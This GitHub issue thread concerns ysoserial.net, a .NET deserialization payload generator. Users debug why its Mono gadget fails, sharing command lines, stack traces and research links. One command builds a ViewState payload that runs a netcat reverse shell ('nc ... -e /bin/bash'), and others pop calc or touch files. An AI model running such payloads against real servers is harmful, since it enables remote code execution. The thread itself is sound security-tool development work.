pwntester / ysoserial.net

Deserialization payload generator for a variety of .NET formatters
MIT License

Payload for Mono not working #86

Closed halfluke closed 2 years ago

halfluke commented 4 years ago

Hi.

Any idea why the typeconfusedelegatemono doesn't work for me?

I built the super simple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate - which should be MAC enabled but not encrypted, .net 4.0 version - looks weird, and the payload generated by ysoserial.net - which is much longer - does not work. I'm using a specific validationkey in web.config for testing.

%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX

Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000

Payload generated with: ./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug

irsdl commented 4 years ago

I can recreate this issue but I don't know how to debug it properly. It seems that it also does not understand ViewStateEncryptionMode="Never"; also, the following does not disable the MAC validation:

<appSettings>
      <add key="aspnet:AllowInsecureDeserialization" value="true" />
</appSettings>

I am not exactly sure why but it would be great if someone with more information can help here.

sushantdhopat commented 3 years ago

Where is the ./ysoserial.exe file in this tool? I didn't get it.

gogo2464 commented 3 years ago

I have got the same trouble with the command .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" -t. A sound is produced but no calc appears.

@sushantdhopat19 ./ysoserial.exe is the compiled binary. To get it I launched ysoserial.sln and built it from Visual Studio.

This commit used to work: https://github.com/pwntester/ysoserial.net/commit/138e21649b9b3977b95f7d3c42e637e17861598c as told in this post. I think Mono has been updated and the gadget is not valuable anymore.

This article may help: https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf

gogo2464 commented 3 years ago

I will take a look at the gadgets. Assign me please. But continue to notify me if somebody wants to make a PR too. I may take a long time.

gogo2464 commented 3 years ago

In order to locate the trouble I made a tiny vulnerable program. Then I put a file .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" > tmp.dat

EDIT When I deserialize, I get the following: END OF EDIT

Binary stream '0' does not contain a valid BinaryHeader. Possible causes are invalid stream or object version change between serialization and deserialization.

It is useful to find the right gadget.

gogo2464 commented 3 years ago

I have found a good article online. I will read it: https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html

gogo2464 commented 3 years ago

@halfluke can you just tell me if you have the same symptom with the calc please?

halfluke commented 3 years ago

I can't confirm about the calc because I tried to generate a payload for linux. How would I test a calc payload if it has to run under linux?

gogo2464 commented 3 years ago

@halfluke try another command like .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "touch file.txt" -t

gogo2464 commented 3 years ago

I found on the internet an article on how this code was built: http://muffsec.com/blog/?p=585

gogo2464 commented 3 years ago

In my opinion the code used to be very close to this code: http://muffsec.com/blog/?p=585 but now SessionSecurityToken has been removed from https://docs.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.sessionsecuritytoken?view=netframework-4.8 and the gadget did not work anymore. The modification might have been removed from the history and might not have been replaced yet.

EDIT: I was wrong, the package is still available in nuget. See: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll But is it present on Mono? I am going to dig.

EDIT: I need an older mono version to test. The newer version of mono.

The code from muffsec works on my machine now. I needed to use an old .NET Framework: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll.

Sadly I just realised it was the code for TypeConfuseDelegate. Not TypeConfuseDelegateMono. I have to dig deeper and deeper.

gogo2464 commented 3 years ago

I am going to try to compile with mono to check the payload.

halfluke commented 3 years ago

Sorry, I do not have time to test much at the moment. Thank you for your efforts.

irsdl commented 2 years ago

It should work in the latest version now (download it from https://github.com/mono/mono/actions)

gogo2464 commented 4 months ago

I still have an error.

PS C:\Users\ME\Desktop> ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -c calc.exe -t

Exception non gérée : System.NullReferenceException: La référence d'objet n'est pas définie à une instance d'un objet.
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.TypeConfuseDelegateGadget(InputArgs inputArgs) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 83
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.Generate(String formatter, InputArgs inputArgs) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 43
   à ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:ligne 75
   à ysoserial.Program.Main(String[] args) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Program.cs:ligne 302
>

It is not my path also.

gogo2464 commented 4 months ago

I installed Unity 2021.3.37f1 on Windows 11.

Then I did git clone https://github.com/pwntester/ysoserial.net/. Then I built from Visual Studio.

.\Debug\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -c calc.exe

Exception non gérée : System.NullReferenceException: La référence d'objet n'est pas définie à une instance d'un objet.
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.TypeConfuseDelegateGadget(InputArgs inputArgs) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 84
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.Generate(String formatter, InputArgs inputArgs) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 43
   à ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:ligne 75
   à ysoserial.Program.Main(String[] args) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Program.cs:ligne 302

gogo2464 commented 4 months ago

Do you need the English for the terminal?